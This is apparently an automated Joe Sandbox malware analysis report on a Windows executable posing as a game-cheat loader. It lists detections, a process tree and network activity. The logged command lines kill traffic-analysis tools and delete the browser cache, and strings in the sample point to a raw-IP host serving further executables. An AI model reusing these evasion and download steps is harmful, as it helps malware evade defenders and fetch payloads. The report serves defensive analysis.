Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PlusPrivStoreAtt116.exe

Overview

General Information

Sample name:PlusPrivStoreAtt116.exe
Analysis ID:1590901
MD5:d4a125241862eb0a4bd1afcf362d914f
SHA1:c3c418450fe4cd0768e214a270374f6e1c8e37f3
SHA256:29c141ee54b805226e0fe7eafe994ec3b461a648861497964acff28d35ba78b8
Tags:exemalwaretrojanuser-Joker
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • PlusPrivStoreAtt116.exe (PID: 3852 cmdline: "C:\Users\user\Desktop\PlusPrivStoreAtt116.exe" MD5: D4A125241862EB0A4BD1AFCF362D914F)
    • conhost.exe (PID: 1360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1172 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 4348 cmdline: taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 2948 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 2748 cmdline: taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 3316 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 1516 cmdline: taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 2456 cmdline: C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • sc.exe (PID: 2156 cmdline: sc stop HTTPDebuggerPro MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 3112 cmdline: C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • sc.exe (PID: 6556 cmdline: sc stop HTTPDebuggerProSdk MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 7120 cmdline: C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 1244 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 4476 cmdline: taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 4764 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 2716 cmdline: taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 1980 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 2656 cmdline: taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5972 cmdline: C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • sc.exe (PID: 6104 cmdline: sc stop HTTPDebuggerPro MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 5580 cmdline: C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • sc.exe (PID: 5748 cmdline: sc stop HTTPDebuggerProSdk MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 6240 cmdline: C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 3304 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 1004 cmdline: taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 1136 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 2632 cmdline: taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 1284 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 1516 cmdline: taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 3980 cmdline: C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • sc.exe (PID: 6812 cmdline: sc stop HTTPDebuggerPro MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 2156 cmdline: C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • sc.exe (PID: 3276 cmdline: sc stop HTTPDebuggerProSdk MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 5972 cmdline: C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: PlusPrivStoreAtt116.exeVirustotal: Detection: 41%Perma Link
Source: PlusPrivStoreAtt116.exeReversingLabs: Detection: 65%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.7% probability
Source: PlusPrivStoreAtt116.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029DA84D strtol,strchr,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,strchr,_strdup,CertOpenStore,GetLastError,free,free,CryptStringToBinaryA,CertFindCertificateInStore,fopen,fseek,ftell,fseek,malloc,fread,fclose,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,CertCloseStore,calloc,CertFreeCertificateContext,fclose,free,CertFreeCertificateContext,free,calloc,0_2_00007FF6029DA84D
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029F63E0 CertOpenStore,GetLastError,CertCreateCertificateChainEngine,GetLastError,CertGetCertificateChain,GetLastError,CertGetNameStringA,malloc,CertFindExtension,CryptDecodeObjectEx,CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,CertFreeCertificateChainEngine,CertCloseStore,CertFreeCertificateChain,CertFreeCertificateContext,0_2_00007FF6029F63E0
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029FD750 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,0_2_00007FF6029FD750
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029FF840 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_00007FF6029FF840
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029D9C10 memset,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_00007FF6029D9C10
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029D9B40 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,0_2_00007FF6029D9B40
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029F6D00 GetLastError,CreateFileA,GetLastError,GetFileSizeEx,GetLastError,malloc,ReadFile,strstr,strstr,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,GetLastError,CloseHandle,free,0_2_00007FF6029F6D00
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029DCAD0 CryptAcquireContextA,CryptCreateHash,0_2_00007FF6029DCAD0
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029DCB20 CryptHashData,0_2_00007FF6029DCB20
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029DCB30 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_00007FF6029DCB30
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: -----BEGIN PUBLIC KEY-----0_2_00007FF6029BF9F0
Source: PlusPrivStoreAtt116.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: mov dword ptr [rbp+04h], 424D53FFh0_2_00007FF6029E9410
Source: unknownHTTPS traffic detected: 104.26.1.5:443 -> 192.168.2.9:49760 version: TLS 1.2
Source: PlusPrivStoreAtt116.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\BACKUP BOTS PRIVATE STORE\Loader Valorant Plus\x64\Release\EpicGames.pdb source: PlusPrivStoreAtt116.exe
Source: Binary string: .D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\BACKUP BOTS PRIVATE STORE\Loader Valorant Plus\x64\Release\EpicGames.pdb source: PlusPrivStoreAtt116.exe
Source: global trafficHTTP traffic detected: POST /api/1.1/ HTTP/1.1Host: keyauth.winAccept: */*Content-Length: 74Content-Type: application/x-www-form-urlencoded
Source: Joe Sandbox ViewIP Address: 104.26.1.5 104.26.1.5
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029D5370 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,memcmp,closesocket,closesocket,closesocket,closesocket,0_2_00007FF6029D5370
Source: global trafficDNS traffic detected: DNS query: keyauth.win
Source: unknownHTTP traffic detected: POST /api/1.1/ HTTP/1.1Host: keyauth.winAccept: */*Content-Length: 74Content-Type: application/x-www-form-urlencoded
Source: PlusPrivStoreAtt116.exeString found in binary or memory: http://167.114.85.75/plusattnewhvcionprivate.exe
Source: PlusPrivStoreAtt116.exeString found in binary or memory: http://167.114.85.75/plusattnewhvcionprivate.exeC:
Source: PlusPrivStoreAtt116.exeString found in binary or memory: http://167.114.85.75/plushvcioffbronkzatualizadoh79.exe
Source: PlusPrivStoreAtt116.exeString found in binary or memory: http://167.114.85.75/plushvcioffbronkzatualizadoh79.exeC:
Source: PlusPrivStoreAtt116.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: PlusPrivStoreAtt116.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
Source: PlusPrivStoreAtt116.exe, 00000000.00000003.1395395872.00000259F16B1000.00000004.00000020.00020000.00000000.sdmp, PlusPrivStoreAtt116.exe, 00000000.00000003.1395284234.00000259F16B1000.00000004.00000020.00020000.00000000.sdmp, PlusPrivStoreAtt116.exe, 00000000.00000003.1395395872.00000259F16B5000.00000004.00000020.00020000.00000000.sdmp, PlusPrivStoreAtt116.exe, 00000000.00000002.2630935797.00000259F1689000.00000004.00000020.00020000.00000000.sdmp, PlusPrivStoreAtt116.exe, 00000000.00000002.2630935797.00000259F165C000.00000004.00000020.00020000.00000000.sdmp, PlusPrivStoreAtt116.exe, 00000000.00000002.2630935797.00000259F16B5000.00000004.00000020.00020000.00000000.sdmp, PlusPrivStoreAtt116.exe, 00000000.00000003.1395284234.00000259F16B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://keyauth.cc/panel/bronkzware/Loader
Source: PlusPrivStoreAtt116.exe, 00000000.00000002.2630935797.00000259F165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://keyauth.win/api/1.1/
Source: PlusPrivStoreAtt116.exe, 00000000.00000002.2630935797.00000259F165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://keyauth.win/api/1.1/ace
Source: PlusPrivStoreAtt116.exe, 00000000.00000002.2630935797.00000259F165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://keyauth.win/api/1.1/umem
Source: PlusPrivStoreAtt116.exe, 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmp, PlusPrivStoreAtt116.exe, 00000000.00000002.2630935797.00000259F165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://keyauth.win/api/1.2/
Source: PlusPrivStoreAtt116.exe, 00000000.00000002.2630935797.00000259F165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://keyauth.win/api/1.2/:
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownHTTPS traffic detected: 104.26.1.5:443 -> 192.168.2.9:49760 version: TLS 1.2
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029FD750 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,0_2_00007FF6029FD750
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029C72900_2_00007FF6029C7290
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029C92900_2_00007FF6029C9290
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029DA84D0_2_00007FF6029DA84D
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029C85D00_2_00007FF6029C85D0
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029B1AA00_2_00007FF6029B1AA0
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029B1E400_2_00007FF6029B1E40
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029CFEA00_2_00007FF6029CFEA0
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029F63E00_2_00007FF6029F63E0
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029CA1500_2_00007FF6029CA150
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029D31A00_2_00007FF6029D31A0
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029E53000_2_00007FF6029E5300
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029AD3100_2_00007FF6029AD310
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029B92A00_2_00007FF6029B92A0
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029FF7D00_2_00007FF6029FF7D0
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029B17500_2_00007FF6029B1750
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029FD7500_2_00007FF6029FD750
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029A974B0_2_00007FF6029A974B
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029DA9150_2_00007FF6029DA915
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029DA90C0_2_00007FF6029DA90C
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029D85D00_2_00007FF6029D85D0
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029A956D0_2_00007FF6029A956D
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029AEC300_2_00007FF6029AEC30
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029AAC0D0_2_00007FF6029AAC0D
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029D5CF00_2_00007FF6029D5CF0
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029C3C400_2_00007FF6029C3C40
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029EDB300_2_00007FF6029EDB30
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029A10000_2_00007FF6029A1000
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029E9E300_2_00007FF6029E9E30
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029DCEE00_2_00007FF6029DCEE0
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029F1EC00_2_00007FF6029F1EC0
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029C0F100_2_00007FF6029C0F10
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029ADEA00_2_00007FF6029ADEA0
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029F0E900_2_00007FF6029F0E90
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: String function: 00007FF6029C6280 appears 380 times
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: String function: 00007FF6029CAD20 appears 34 times
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: String function: 00007FF6029C9790 appears 36 times
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: String function: 00007FF6029B3940 appears 49 times
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: String function: 00007FF6029CABB0 appears 37 times
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: String function: 00007FF6029C96C0 appears 46 times
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: String function: 00007FF6029C0B50 appears 70 times
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: String function: 00007FF6029CAC40 appears 33 times
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: String function: 00007FF6029C6400 appears 326 times
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: String function: 00007FF602A00B6C appears 47 times
Source: classification engineClassification label: mal56.winEXE@66/18@1/2
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029B275E FormatMessageA,strchr,_errno,_errno,GetLastError,SetLastError,0_2_00007FF6029B275E
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1360:120:WilError_03
Source: PlusPrivStoreAtt116.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: PlusPrivStoreAtt116.exeVirustotal: Detection: 41%
Source: PlusPrivStoreAtt116.exeReversingLabs: Detection: 65%
Source: PlusPrivStoreAtt116.exeString found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectory0123456789abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ(nil)(nil)I32I64%ld.%ld$@
Source: unknownProcess created: C:\Users\user\Desktop\PlusPrivStoreAtt116.exe "C:\Users\user\Desktop\PlusPrivStoreAtt116.exe"
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProSdk
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProSdk
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1
